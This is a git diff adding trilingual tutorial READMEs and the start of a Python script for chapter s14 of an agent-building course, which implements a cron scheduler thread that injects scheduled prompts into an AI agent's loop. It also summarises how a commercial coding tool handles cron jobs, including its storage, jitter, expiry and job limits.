+    messages.append({"role": "user",
+                     "content": f"[Scheduled] {job.prompt}"})
+```
+
+The producer (scheduler thread) and consumer (agent_loop) are decoupled via `cron_queue` + `cron_lock` — the threading pattern from s13, applied directly.
+
+### Durable vs. Session-only
+
+- **Durable**: The task definition is written to `.scheduled_tasks.json`. When the Agent restarts, it loads the file and restores the tasks.
+- **Session-only**: Lives only in memory. Gone when the Agent exits.
+

The Agent decides for itself — "this scheduled task only needs to run today" → session-only; "run tests every morning" → durable.

> **Important caveat**: The cron scheduler is not the same as OS-level crontab. **It must run inside the Agent process** — if the process shuts down, scheduling stops too. Durable only means the task definition survives restarts: after the Agent starts up again, the job fires the next time its schedule matches; triggers missed while the process was down are not replayed. If you need tasks that fire even when the application is closed, use system crontab or systemd timers.

### Putting It All Together

```
1. On startup:
    load_durable_jobs() → restore durable tasks from .scheduled_tasks.json
    Thread(cron_scheduler_loop, daemon=True).start() → scheduler thread begins polling

2. Register a task:
    schedule_cron(cron="*/2 * * * *", prompt="run date", durable=True)
    → CronJob written to scheduled_jobs + .scheduled_tasks.json

3. Every 2 minutes:
    Scheduler thread checks → cron_matches returns True → cron_queue.append(job)
    → agent_loop next iteration calls consume_cron_queue → injects "[Scheduled] run date"
    → LLM receives the message, executes the date command

4. Process shuts down:
    Scheduler thread stops too (daemon=True)
    .scheduled_tasks.json remains on disk
    Next startup → load_durable_jobs → tasks restored
```

---

## Changes from s13

| Component | Before (s13) | After (s14) |
|-----------|-------------|-------------|
| Trigger mechanism | User triggers manually | Standalone scheduler thread triggers automatically |
| New type | — | CronJob dataclass (id, cron, prompt, recurring, durable) |
| New functions | — | cron_matches, schedule_job, cancel_job, cron_scheduler_loop |
| New storage | — | .scheduled_tasks.json (durable) + memory (session-only) |
| Threads | Background execution thread | + Scheduler thread (daemon, 1s polling) |
| Queues | background_results | + cron_queue (scheduler thread writes, agent_loop reads) |
| Tools | 7 (s12/s13) | + schedule_cron, list_crons, cancel_cron (10) |

---

## Try It

```sh
cd learn-claude-code
python s14_cron_scheduler/code.py
```

Try these prompts:

1. `Schedule a task to print the current date every 2 minutes`
2. `List all cron jobs`
3. `Create a one-shot reminder in 1 minute to check the build status`
4. `Cancel the recurring job and verify with list_crons`

What to observe: Is the scheduler thread running independently? Do cron tasks fire at the correct times? Does the Agent receive injected messages after firing? Are durable jobs written to `.scheduled_tasks.json`?

---

## What's Next

A single Agent can do a lot now — it can plan, compact context, run tasks in the background, and fire on a schedule. But some tasks are too big for one Agent to handle alone.

"Refactor the entire backend" — overhaul the auth module, database layer, API routes, and tests all at once. One Agent's attention is limited. This needs a team.

s15 Agent Teams → One Agent isn't enough. Form a team. Persistent teammates + async inboxes.
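
Before the source-level deep dive, one practical note: the matching behavior in the walkthrough can be verified without waiting for real minutes to pass, by feeding synthetic datetimes to the matcher. A self-contained copy of the chapter's `cron_matches`, driven over five consecutive minutes:

```python
from datetime import datetime

def _cron_field_matches(field: str, value: int) -> bool:
    if field == "*":
        return True
    if field.startswith("*/"):
        step = int(field[2:])
        return step > 0 and value % step == 0
    if "," in field:
        return any(_cron_field_matches(f.strip(), value)
                   for f in field.split(","))
    if "-" in field:
        lo, hi = field.split("-", 1)
        return int(lo) <= value <= int(hi)
    return value == int(field)

def cron_matches(cron_expr: str, dt: datetime) -> bool:
    fields = cron_expr.strip().split()
    if len(fields) != 5:
        return False
    minute, hour, dom, month, dow = fields
    dow_val = (dt.weekday() + 1) % 7  # Python Monday=0 → cron Sunday=0
    return all([
        _cron_field_matches(minute, dt.minute),
        _cron_field_matches(hour, dt.hour),
        _cron_field_matches(dom, dt.day),
        _cron_field_matches(month, dt.month),
        _cron_field_matches(dow, dow_val),
    ])

# "*/2 * * * *" should fire on even minutes only
fired = [m for m in range(5)
         if cron_matches("*/2 * * * *", datetime(2026, 3, 31, 9, m))]
print(fired)  # → [0, 2, 4]
```

This kind of pure-function test is why `cron_matches` takes an explicit `dt` parameter instead of calling `datetime.now()` itself.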
+
## Deep Dive into CC Source

> The following is a complete analysis based on CC source code `CronCreateTool.ts`, `cronScheduler.ts`, `cron.ts`, `cronTasks.ts`, `cronTasksLock.ts`, and `useScheduledTasks.ts` (139 lines).

### 1. Three Cron Tools

CC exposes three cron tools to the model: `CronCreate`, `CronDelete`, and `CronList`. All are gated by the compile-time feature flag `feature('AGENT_TRIGGERS')` and the runtime GrowthBook flag `tengu_kairos_cron`. There is also a `CLAUDE_CODE_DISABLE_CRON` environment variable for local overrides.

### 2. Storage: `.claude/scheduled_tasks.json`

```json
{ "tasks": [{ "id": "abc12345", "cron": "0 9 * * *", "prompt": "...", "recurring": true, "durable": true, "createdAt": 1714567890000 }] }
```

Durable tasks are written to disk; session-only tasks live in a `STATE.sessionCronTasks` in-memory array (lost on process restart). A `.scheduled_tasks.lock` file prevents multiple sessions of the same project from triggering duplicate tasks.

### 3. Scheduler: 1-Second Polling

`cronScheduler.ts` checks every second (`CHECK_INTERVAL_MS = 1000`). Whoever holds the lock triggers file-based tasks; all sessions trigger session-only tasks. A `chokidar` file watcher also monitors `scheduled_tasks.json` for changes.

### 4. Cron Expressions: Standard 5-Field

Minute Hour Day Month Day-of-week. Supports `*`, `*/N`, `N`, `N-M`, `N-M/S`, `N,M,...`. Does not support `L`, `W`, or `?`. All times are interpreted in the local timezone. When both day-of-month and day-of-week are constrained, OR semantics apply.

### 5. Jitter (Thundering Herd Prevention)

- **Recurring tasks**: Trigger delay up to 10% of the period (capped at 15 minutes), based on a deterministic hash of the task ID
- **One-shot tasks**: When the trigger time falls on `:00` or `:30`, fires up to 90 seconds early
- Jitter configuration is adjustable in real-time via GrowthBook, refreshed every 60 seconds

### 6. Auto-Expiration

Recurring tasks auto-expire after 7 days (configurable, max 30 days). One final trigger fires at expiration, after which the task is automatically deleted.

### 7. Job Limit

`MAX_JOBS = 50` (`CronCreateTool.ts:25`). When exceeded, returns error: "Too many scheduled jobs (max 50). Cancel one first."

### 8. Trigger Injection

After triggering, the job is enqueued via `enqueuePendingNotification()` with `priority: 'later'` into the command queue. It is tagged with `workload: WORKLOAD_CRON` — the API serves cron-initiated requests at a lower QoS when capacity is constrained.
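
For a feel of the deterministic jitter in §5, here is a hypothetical reconstruction: the delay is derived from a stable hash of the task ID, capped at 10% of the period or 15 minutes, whichever is smaller. This is a sketch of the described behavior, not CC's actual code; the function name and hash choice are assumptions.

```python
import hashlib

def recurring_jitter_s(task_id: str, period_s: float) -> float:
    """Deterministic delay in seconds: same ID → same delay, every time."""
    cap = min(period_s * 0.10, 15 * 60)  # 10% of period, capped at 15 min
    digest = hashlib.sha256(task_id.encode()).hexdigest()
    fraction = int(digest, 16) % 10_000 / 10_000  # stable value in [0, 1)
    return fraction * cap

# A fleet of sessions sharing the same schedule spreads its triggers out,
# while any single task keeps a fixed, reproducible offset.
```

Because the offset is a pure function of the ID, re-polling never makes a task drift: it is delayed by the same amount on every firing.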
+ + diff --git a/s14_cron_scheduler/README.ja.md b/s14_cron_scheduler/README.ja.md new file mode 100644 index 000000000..8d5f2b448 --- /dev/null +++ b/s14_cron_scheduler/README.ja.md @@ -0,0 +1,263 @@ +# s14: Cron Scheduler — 時間で発火、人の押しが不要 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s12 → s13 → `s14` → [s15](../s15_agent_teams/) → s16 → ... → s19 +> *"時間で発火、人の押しが不要"* — cron スケジューリング、永続またはセッションレベル。 +> +> **Harness 層**: スケジューリング — Agent が自らのタイムテーブルで行動。 + +--- + +## 課題 + +目覚まし時計は、あなたが見つめていないと鳴らないわけではない。7:00 にセットすれば、その時刻になれば勝手に鳴る — 寝ていても、シャワー中でも、料理中でも関係ない。 + +s13 で Agent はバックグラウンドで時間のかかる操作を実行できるようになった。しかし、すべての操作は依然として手動でトリガーされている。ユーザーが一言言えば、Agent が一つ動く。「毎日朝 9 時にテストを実行」「30 分ごとに CI ステータスを確認」— こうした周期タスクは、毎回人が押すべきではない。 + +--- + +## 解決策 + +![Cron Scheduler Overview](images/cron-scheduler-overview.ja.svg) + +s13 のバックグラウンドスレッド、タスクシステム、prompt 組み立てはすべてそのまま残す。新たに追加:**独立した cron スケジューリングスレッド** — daemon スレッドで動き、毎秒チェック、時間が来たらタスクを `cron_queue` に放り込む。Agent のメインループはキューからトリガーされたタスクを消費し、会話に注入する。 + +手動 vs 定時: + +| | 手動トリガー (s13) | 定時トリガー (s14) | +|---|---|---| +| トリガー主体 | ユーザー入力 | スケジューリングスレッドが自動 | +| トリガーのタイミング | いつでも | cron 式で指定 | +| 人の介入が必要 | はい | いいえ | +| 永続性 | — | durable で再起動を跨ぐ | + +--- + +## 仕組み + +### CronJob: データ構造 + +各 cron タスクは `CronJob` オブジェクト: + +```python +@dataclass +class CronJob: + id: str + cron: str # "0 9 * * *" (5 フィールド cron 式) + prompt: str # トリガー時に Agent に注入されるメッセージ + recurring: bool # True=周期的, False=一回限り + durable: bool # True=ディスクに書き込み、セッションを跨いで保持 +``` + +cron 式 — 5 フィールド、Unix で 50 年使われている: + +``` +分 時 日 月 曜日 + * * * * * 毎分 + 0 9 * * * 毎日 9:00 +*/5 * * * * 5 分ごと + 0 9 * * 1-5 平日 9:00 +``` + +`*`、`*/N`、`N`、`N-M`、`N,M,...` に対応。 + +### cron_matches: 5 フィールドマッチング + +毎回のポーリングで、現在時刻を各 job の cron 式と比較: + +```python +def _cron_field_matches(field: str, value: int) -> bool: + if field == "*": + return True + if field.startswith("*/"): + step = int(field[2:]) + return step > 0 and value % step == 0 + if "," in field: + return 
any(_cron_field_matches(f.strip(), value)
                   for f in field.split(","))
    if "-" in field:
        lo, hi = field.split("-", 1)
        return int(lo) <= value <= int(hi)
    return value == int(field)

def cron_matches(cron_expr: str, dt: datetime) -> bool:
    fields = cron_expr.strip().split()
    if len(fields) != 5:
        return False
    minute, hour, dom, month, dow = fields
    dow_val = (dt.weekday() + 1) % 7  # Python Monday=0 → cron Sunday=0
    return all([
        _cron_field_matches(minute, dt.minute),
        _cron_field_matches(hour, dt.hour),
        _cron_field_matches(dom, dt.day),
        _cron_field_matches(month, dt.month),
        _cron_field_matches(dow, dow_val),
    ])
```

フィールドごとにマッチング、5 つすべて通過すればマッチ成立。

### 独立スケジューリングスレッド: 毎秒ポーリング

**これが前の README との最大の違い**:スケジューラは独立した daemon スレッドで動き、agent_loop が実行中かどうかに依存しない:

```python
def cron_scheduler_loop():
    """Independent daemon thread: poll every 1s, fire matching jobs."""
    while True:
        time.sleep(1)
        now = datetime.now()
        minute_marker = int(now.timestamp() // 60)  # minutes since epoch
        with cron_lock:
            for job in list(scheduled_jobs.values()):
                if cron_matches(job.cron, now):
                    if _last_fired.get(job.id) != minute_marker:
                        cron_queue.append(job)
                        _last_fired[job.id] = minute_marker
                        if not job.recurring:
                            scheduled_jobs.pop(job.id, None)
                            if job.durable:
                                save_durable_jobs()

threading.Thread(target=cron_scheduler_loop, daemon=True).start()
```

重要な設計:
- **agent_loop から独立**:ユーザーが入力していなくても、スケジューラはバックグラウンドで動き続ける
- **minute_marker で重複防止**:エポックからの経過分数をマーカーにすることで、同じ分内では一度しかトリガーしない(1 秒ポーリングは同じ分を約 60 回チェックする。`hour * 60 + minute` だけをマーカーにすると翌日の同時刻と値が重なり、毎日実行のジョブが誤って抑止される)
- **一回限りタスク**:トリガー後、自動的に scheduled_jobs から削除

### agent_loop: 消費側

agent_loop は時間をチェックしない — `cron_queue` からトリガーされたタスクを取り出し、messages に注入するだけ:

```python
# 各 LLM 呼び出しの前に、トリガーされた cron タスクを消費
fired = consume_cron_queue()
for job in fired:
    messages.append({"role": "user",
                     "content": f"[Scheduled] {job.prompt}"})
```

生産者(スケジューリングスレッド)と消費者(agent_loop)は `cron_queue` + `cron_lock` で疎結合 — s13 で学んだ threading パターンをそのまま応用。

### Durable vs Session-only

- **Durable**:タスク定義を `.scheduled_tasks.json` に書き込む。Agent 再起動後にファイルを読み込み、タスクを復元。
- **Session-only**:メモリ内のみ。Agent を閉じると消える。

Agent 自身が判断できる — 「この定期タスクは今日だけ必要」→ session-only、「毎朝テストを実行」→ durable。

> **重要な前提**:cron スケジューラは OS レベルの crontab とは異なる。**Agent プロセス内で動かなければならない** — プロセスが終了すればスケジューリングも止まる。Durable はタスク定義が再起動を跨いで保持されるという意味に過ぎない。再起動後は、次にスケジュールが一致した時点で再びトリガーされる(停止中に逃したトリガーの補完実行はない)。もし「アプリケーションが停止していても定期的に実行」したいなら、システム crontab または systemd timer を使用してください。

### 全体の動き

```
1. 起動時:
    load_durable_jobs() → .scheduled_tasks.json から durable タスクを復元
    Thread(cron_scheduler_loop, daemon=True).start() → スケジューリングスレッドがポーリング開始

2. タスク登録:
    schedule_cron(cron="*/2 * * * *", prompt="run date", durable=True)
    → CronJob を scheduled_jobs + .scheduled_tasks.json に書き込み

3. 2 分ごと:
    スケジューリングスレッドがチェック → cron_matches が True を返す → cron_queue.append(job)
    → agent_loop の次のサイクルで consume_cron_queue → "[Scheduled] run date" を注入
    → LLM がメッセージを受信し、date コマンドを実行

4. プロセス終了:
    スケジューリングスレッドも一緒に停止(daemon=True)
    .scheduled_tasks.json はディスクに残る
    次回起動 → load_durable_jobs → タスクが復元
```

---

## s13 からの変更点

| コンポーネント | 変更前 (s13) | 変更後 (s14) |
|------|-----------|-----------|
| トリガー方式 | ユーザーが手動トリガー | 独立スケジューリングスレッドが自動トリガー |
| 新しい型 | — | CronJob dataclass (id, cron, prompt, recurring, durable) |
| 新しい関数 | — | cron_matches, schedule_job, cancel_job, cron_scheduler_loop |
| 新しいストレージ | — | .scheduled_tasks.json (durable) + メモリ (session-only) |
| スレッド | バックグラウンド実行スレッド | + スケジューリングスレッド (daemon, 1 秒ポーリング) |
| キュー | background_results | + cron_queue (スケジューリングスレッドが書き込み, agent_loop が読み取り) |
| ツール | 7 (s12/s13) | + schedule_cron, list_crons, cancel_cron (10) |

---

## 試してみる

```sh
cd learn-claude-code
python s14_cron_scheduler/code.py
```

以下のプロンプトを試してみよう:

1. `Schedule a task to print the current date every 2 minutes`
2. `List all cron jobs`
3. `Create a one-shot reminder in 1 minute to check the build status`
4. `Cancel the recurring job and verify with list_crons`

観察のポイント:スケジューリングスレッドが独立して動いているか? cron タスクが正しい時刻にトリガーされているか? トリガー後、Agent に注入されたメッセージが届いているか? durable job が `.scheduled_tasks.json` に書き込まれているか?

---

## 次のステップ

一つの Agent でもできることが増えた — 計画、圧縮、バックグラウンド、定時実行。しかし中には、一つの Agent では対応しきれないほど大きなタスクがある。

「バックエンド全体をリファクタリング」— 認証モジュール、データベース層、API ルート、テストをすべて刷新する。一つの Agent の注意力には限界がある、これはチームでやるべき仕事だ。

s15 Agent Teams → 一つの Agent で足りないなら、チームを組もう。永続的なチームメイト + 非同期メールボックス。
+CC ソースコード深掘り + +> 以下は CC ソースコード `CronCreateTool.ts`、`cronScheduler.ts`、`cron.ts`、`cronTasks.ts`、`cronTasksLock.ts`、`useScheduledTasks.ts`(139 行)の完全分析に基づく。 + +### 一、3 つの Cron ツール + +CC はモデルに 3 つの cron ツールを公開している:`CronCreate`、`CronDelete`、`CronList`。すべてコンパイル時ゲート `feature('AGENT_TRIGGERS')` とランタイム GrowthBook フラグ `tengu_kairos_cron` で制御されている。さらに `CLAUDE_CODE_DISABLE_CRON` 環境変数によるローカル上書きも可能。 + +### 二、ストレージ:`.claude/scheduled_tasks.json` + +```json +{ "tasks": [{ "id": "abc12345", "cron": "0 9 * * *", "prompt": "...", "recurring": true, "durable": true, "createdAt": 1714567890000 }] } +``` + +Durable タスクはディスクに書き込まれる。session-only タスクは `STATE.sessionCronTasks` のメモリ配列に格納(プロセス再起動で消失)。さらに `.scheduled_tasks.lock` ファイルで、同じプロジェクトの複数セッションによる重複トリガーを防止。 + +### 三、スケジューラ:1 秒ポーリング + +`cronScheduler.ts` は毎秒チェック(`CHECK_INTERVAL_MS = 1000`)。ロックを保持しているセッションがファイルタスクをトリガー。すべてのセッションは session-only タスクをトリガー。さらに `chokidar` ファイルウォッチャーが `scheduled_tasks.json` の変更を監視。 + +### 四、cron 式:標準 5 フィールド + +分 時 日 月 曜日。`*`、`*/N`、`N`、`N-M`、`N-M/S`、`N,M,...` に対応。`L`、`W`、`?` は非対応。すべての時間はローカルタイムゾーンで解釈。day-of-month と day-of-week が同時に指定された場合、OR セマンティクスで評価。 + +### 五、ジッター(雷鳴効果防止) + +- **繰り返しタスク**:トリガー遅延は最大で期間の 10%(上限 15 分)、タスク ID の決定論的ハッシュに基づく +- **一回限りタスク**:トリガー時刻が `:00` または `:30` に該当する場合、最大 90 秒前にトリガー +- ジッター設定は GrowthBook でリアルタイム調整可能、60 秒ごとに更新 + +### 六、自動期限切れ + +繰り返しタスクは 7 日後に自動期限切れ(設定可能、上限 30 日)。期限切れの最後のトリガーを実行後、自動削除。 + +### 七、ジョブ数上限 + +`MAX_JOBS = 50`(`CronCreateTool.ts:25`)。上限を超えるとエラーを返す:"Too many scheduled jobs (max 50). Cancel one first." + +### 八、トリガー注入 + +トリガー後、`enqueuePendingNotification()` で `priority: 'later'` としてコマンドキューに入る。`workload: WORKLOAD_CRON` のマークが付く — API は容量が逼迫しているとき、cron 発のリクエストにより低い QoS で対応する。 + +
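
「六、自動期限切れ」は、作成時刻と現在時刻の差分チェックとして考えると分かりやすい。以下は本文の記述に基づく仮想的なスケッチで、CC の実装そのものではない(関数名・既定値はこちらで置いたもの):

```python
from datetime import datetime, timedelta

DEFAULT_EXPIRY = timedelta(days=7)  # 本文の既定値(最大 30 日まで設定可能とされる)

def expired_ids(created_at: dict[str, datetime], now: datetime,
                expiry: timedelta = DEFAULT_EXPIRY) -> list[str]:
    """期限を過ぎた繰り返しタスクの ID を返す。

    呼び出し側は、最後の 1 回をトリガーした後にこれらを削除する想定。
    """
    return [tid for tid, t in created_at.items() if now - t > expiry]

created = {"cron_a": datetime(2026, 3, 1, 9, 0),   # 24 日前 → 期限切れ
           "cron_b": datetime(2026, 3, 20, 9, 0)}  # 5 日前 → 有効
expired = expired_ids(created, datetime(2026, 3, 25, 9, 0))
print(expired)  # → ["cron_a"]
```

期限判定をポーリングループから切り出して純関数にしておくと、実時間を待たずにテストできる。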
+ + diff --git a/s14_cron_scheduler/README.md b/s14_cron_scheduler/README.md new file mode 100644 index 000000000..6adfaf7ee --- /dev/null +++ b/s14_cron_scheduler/README.md @@ -0,0 +1,263 @@ +# s14: Cron Scheduler — 定时触发,不需要人推 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s12 → s13 → `s14` → [s15](../s15_agent_teams/) → s16 → ... → s19 +> *"定时触发, 不需要人推"* — cron 调度, 持久化或会话级。 +> +> **Harness 层**: 调度 — Agent 自己按时间表做事。 + +--- + +## 问题 + +闹钟不需要你盯着它才会响。你设好 7:00,到点它自己响——你在睡觉、在洗澡、在做饭,它都照响不误。 + +s13 让 Agent 能后台执行慢操作——但所有操作仍然是你手动触发的。你说一句,Agent 动一下。"每天早上 9 点跑测试"、"每 30 分钟检查 CI 状态"——这些周期性任务不该需要人每次来推。 + +--- + +## 解决方案 + +![Cron Scheduler Overview](images/cron-scheduler-overview.svg) + +s13 的后台线程、任务系统、prompt 组装全部保留。新增:**独立的 cron 调度线程**——跑在 daemon 线程里,每秒检查一次,时间到了把任务塞进 `cron_queue`。Agent 的主循环从队列里消费触发的任务,注入到对话里。 + +手动 vs 定时: + +| | 手动触发 (s13) | 定时触发 (s14) | +|---|---|---| +| 触发者 | 用户输入 | 调度线程自动 | +| 触发时机 | 随时 | cron 表达式指定 | +| 需要人参与 | 是 | 否 | +| 持久性 | — | durable 跨重启 | + +--- + +## 工作原理 + +### CronJob: 数据结构 + +每个 cron 任务是一个 `CronJob` 对象: + +```python +@dataclass +class CronJob: + id: str + cron: str # "0 9 * * *" (五段式 cron 表达式) + prompt: str # 触发时注入给 Agent 的消息 + recurring: bool # True=周期性,False=一次性 + durable: bool # True=写磁盘,跨会话保留 +``` + +Cron 表达式——五段式,Unix 用了 50 年: + +``` +分钟 小时 日 月 星期 + * * * * * 每分钟 + 0 9 * * * 每天早上 9:00 + */5 * * * * 每 5 分钟 + 0 9 * * 1-5 工作日早上 9:00 +``` + +支持 `*`、`*/N`、`N`、`N-M`、`N,M,...`。 + +### cron_matches: 五段式匹配 + +每次轮询,把当前时间跟每个 job 的 cron 表达式比较: + +```python +def _cron_field_matches(field: str, value: int) -> bool: + if field == "*": + return True + if field.startswith("*/"): + step = int(field[2:]) + return step > 0 and value % step == 0 + if "," in field: + return any(_cron_field_matches(f.strip(), value) + for f in field.split(",")) + if "-" in field: + lo, hi = field.split("-", 1) + return int(lo) <= value <= int(hi) + return value == int(field) + +def cron_matches(cron_expr: str, dt: datetime) -> bool: + fields = 
cron_expr.strip().split()
    if len(fields) != 5:
        return False
    minute, hour, dom, month, dow = fields
    dow_val = (dt.weekday() + 1) % 7  # Python Monday=0 → cron Sunday=0
    return all([
        _cron_field_matches(minute, dt.minute),
        _cron_field_matches(hour, dt.hour),
        _cron_field_matches(dom, dt.day),
        _cron_field_matches(month, dt.month),
        _cron_field_matches(dow, dow_val),
    ])
```

逐字段匹配,5 个字段全部通过才算匹配。

### 独立调度线程: 每秒轮询

**这是跟之前 README 最大的区别**:调度器跑在独立的 daemon 线程里,不依赖 agent_loop 是否在执行:

```python
def cron_scheduler_loop():
    """Independent daemon thread: poll every 1s, fire matching jobs."""
    while True:
        time.sleep(1)
        now = datetime.now()
        minute_marker = int(now.timestamp() // 60)  # minutes since epoch
        with cron_lock:
            for job in list(scheduled_jobs.values()):
                if cron_matches(job.cron, now):
                    if _last_fired.get(job.id) != minute_marker:
                        cron_queue.append(job)
                        _last_fired[job.id] = minute_marker
                        if not job.recurring:
                            scheduled_jobs.pop(job.id, None)
                            if job.durable:
                                save_durable_jobs()

threading.Thread(target=cron_scheduler_loop, daemon=True).start()
```

关键设计:
- **独立于 agent_loop**:即使用户没在输入,调度器也在后台跑
- **minute_marker 防重复**:以"自纪元起的分钟数"做标记,同一分钟内只触发一次(1 秒轮询会把同一分钟检查约 60 次;若只用 `hour * 60 + minute` 做标记,第二天同一时刻的值会与前一天重复,每日任务会被误拦)
- **一次性任务**:触发后自动从 scheduled_jobs 里删除

### agent_loop: 消费端

agent_loop 不负责检查时间——它只从 `cron_queue` 里拿触发的任务,注入到 messages 里:

```python
# 每轮 LLM 调用前,消费已触发的 cron 任务
fired = consume_cron_queue()
for job in fired:
    messages.append({"role": "user",
                     "content": f"[Scheduled] {job.prompt}"})
```

生产者(调度线程)和消费者(agent_loop)通过 `cron_queue` + `cron_lock` 解耦——s13 教的 threading 模式直接用上了。

### Durable vs Session-only

- **Durable**:任务定义写进 `.scheduled_tasks.json`。Agent 重启后加载文件,恢复任务。
- **Session-only**:只在内存里。Agent 关闭就没了。

Agent 可以自己决定——"这个定时任务只要今天有效"→ session-only,"每天早上跑测试"→ durable。

> **重要前提**:cron 调度器跟 OS 级 crontab 不一样。**它必须在 Agent 进程内跑**——进程关闭,调度也停。Durable 只意味着任务定义跨重启保留:下次 Agent 启动后,任务会在下一次时间匹配时再触发(进程停止期间错过的触发不会补跑)。如果你需要"即使应用关闭也能定时跑",请用系统 crontab 或 systemd timer。

### 合起来跑

```
+1. 启动时: + load_durable_jobs() → 从 .scheduled_tasks.json 恢复持久化任务 + Thread(cron_scheduler_loop, daemon=True).start() → 调度线程开始轮询 + +2. 注册任务: + schedule_cron(cron="*/2 * * * *", prompt="run date", durable=True) + → CronJob 写入 scheduled_jobs + .scheduled_tasks.json + +3. 每 2 分钟: + 调度线程检查 → cron_matches 返回 True → cron_queue.append(job) + → agent_loop 下次循环 consume_cron_queue → 注入 "[Scheduled] run date" + → LLM 收到消息,执行 date 命令 + +4. 关闭进程: + 调度线程跟着停(daemon=True) + .scheduled_tasks.json 还在磁盘上 + 下次启动 → load_durable_jobs → 任务恢复 +``` + +--- + +## 相对 s13 的变更 + +| 组件 | 之前 (s13) | 之后 (s14) | +|------|-----------|-----------| +| 触发方式 | 用户手动触发 | 独立调度线程自动触发 | +| 新类型 | — | CronJob dataclass (id, cron, prompt, recurring, durable) | +| 新函数 | — | cron_matches, schedule_job, cancel_job, cron_scheduler_loop | +| 新存储 | — | .scheduled_tasks.json (durable) + 内存 (session-only) | +| 线程 | 后台执行线程 | + 调度线程 (daemon, 1s 轮询) | +| 队列 | background_results | + cron_queue (调度线程写, agent_loop 读) | +| 工具 | 7 (s12/s13) | + schedule_cron, list_crons, cancel_cron (10) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s14_cron_scheduler/code.py +``` + +试试这些 prompt: + +1. `Schedule a task to print the current date every 2 minutes` +2. `List all cron jobs` +3. `Create a one-shot reminder in 1 minute to check the build status` +4. `Cancel the recurring job and verify with list_crons` + +观察重点:调度线程是否在独立运行?cron 任务是否在正确的时间点触发?触发后 Agent 是否收到注入的消息?durable job 是否写入了 `.scheduled_tasks.json`? + +--- + +## 接下来 + +一个 Agent 能做很多事了——能计划、能压缩、能后台、能定时。但有些任务太大了,不是一个 Agent 能搞定的。 + +"重构整个后端"——把认证模块、数据库层、API 路由、测试全部翻新。一个 Agent 的注意力是有限的,这需要一个团队。 + +s15 Agent Teams → 一个 Agent 不够,组队吧。持久队友 + 异步收件箱。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `CronCreateTool.ts`、`cronScheduler.ts`、`cron.ts`、`cronTasks.ts`、`cronTasksLock.ts`、`useScheduledTasks.ts`(139 行)的完整分析。 + +### 一、三个 Cron 工具 + +CC 暴露了三个 cron 工具给模型:`CronCreate`、`CronDelete`、`CronList`。全部由编译时门控 `feature('AGENT_TRIGGERS')` 和运行时 GrowthBook 标志 `tengu_kairos_cron` 控制。还有一个 `CLAUDE_CODE_DISABLE_CRON` 环境变量做本地覆盖。 + +### 二、存储:`.claude/scheduled_tasks.json` + +```json +{ "tasks": [{ "id": "abc12345", "cron": "0 9 * * *", "prompt": "...", "recurring": true, "durable": true, "createdAt": 1714567890000 }] } +``` + +Durable 任务写磁盘;session-only 任务存于 `STATE.sessionCronTasks` 内存数组(进程重启丢失)。还有一个 `.scheduled_tasks.lock` 文件防止同项目的多个 session 重复触发。 + +### 三、调度器:1 秒轮询 + +`cronScheduler.ts` 每秒检查一次(`CHECK_INTERVAL_MS = 1000`)。谁持有锁谁触发文件任务;所有 session 都触发仅 session 任务。还有一个 `chokidar` 文件观察者监视 `scheduled_tasks.json` 变更。 + +### 四、Cron 表达式:标准 5 字段 + +分钟 小时 日 月 星期。支持 `*`、`*/N`、`N`、`N-M`、`N-M/S`、`N,M,...`。不支持 `L`、`W`、`?`。所有时间以本地时区解释。Day-of-month 和 day-of-week 同时约束时用 OR 语义。 + +### 五、抖动(防惊群效应) + +- **重复性任务**:触发延迟最多可达期间的 10%(上限 15 分钟),基于任务 ID 的确定性哈希 +- **一次性任务**:当触发时间落在 `:00` 或 `:30` 时,最多提前 90 秒触发 +- 抖动配置可通过 GrowthBook 实时调整,60 秒刷新一次 + +### 六、自动过期 + +重复性任务 7 天后自动过期(可配置,上限 30 天)。过期前最后一次触发,触发后自动删除。 + +### 七、作业数上限 + +`MAX_JOBS = 50`(`CronCreateTool.ts:25`)。超限时返回错误:"Too many scheduled jobs (max 50). Cancel one first." + +### 八、触发注入 + +触发后通过 `enqueuePendingNotification()` 以 `priority: 'later'` 入队命令队列。标记 `workload: WORKLOAD_CRON`——API 在容量紧张时以更低的 QoS 为 cron 发起的请求服务。 + +
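
第四节提到 CC 的 cron 解析还支持 `N-M/S`(带步进的区间),这是本章教学版 `_cron_field_matches` 没有覆盖的语法。下面是一个假设性的扩展示意(非 CC 真实实现),展示如何在区间匹配上叠加步进:

```python
def field_matches(field: str, value: int, lo_default: int = 0,
                  hi_default: int = 59) -> bool:
    """在教学版匹配器基础上增加 N-M/S:例如 "0-30/10" 匹配 0、10、20、30。"""
    if "," in field:
        return any(field_matches(p.strip(), value, lo_default, hi_default)
                   for p in field.split(","))
    step = 1
    if "/" in field:
        field, s = field.split("/", 1)
        step = int(s)
    if field == "*":
        lo, hi = lo_default, hi_default  # 字段取值范围;默认按"分钟"字段处理
    elif "-" in field:
        lo, hi = (int(x) for x in field.split("-", 1))
    else:
        return value == int(field) and step == 1  # 单值不带步进
    return lo <= value <= hi and (value - lo) % step == 0

print([m for m in range(60) if field_matches("0-30/10", m)])  # → [0, 10, 20, 30]
```

注意步进以区间下界为起点计(`value - lo`),所以 `*/N` 等价于 `0-59/N`,与教学版 `value % N == 0` 的语义一致。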
+ + diff --git a/s14_cron_scheduler/code.py b/s14_cron_scheduler/code.py new file mode 100644 index 000000000..6f5184dd3 --- /dev/null +++ b/s14_cron_scheduler/code.py @@ -0,0 +1,599 @@ +#!/usr/bin/env python3 +""" +s14: Cron Scheduler — independent daemon thread polling + cron_queue injection. + +Run: python s14_cron_scheduler/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s13: + - CronJob dataclass (id, cron, prompt, recurring, durable) + - cron_matches: 5-field cron expression matching (* */N N N-M N,M,...) + - schedule_job / cancel_job: register/remove cron jobs + - cron_scheduler_loop: independent daemon thread, polls every 1s + - cron_queue: thread-safe queue, scheduler writes, agent_loop consumes + - Durable storage: .scheduled_tasks.json (survives restart) + - 3 new tools: schedule_cron, list_crons, cancel_cron + +ASCII flow: + [daemon thread] cron_scheduler_loop (sleep 1s → check → fire → queue) + | + v + cron_queue ──→ agent_loop (consume → inject message → LLM → tools) +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from datetime import datetime +from dataclasses import dataclass, asdict, field + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic 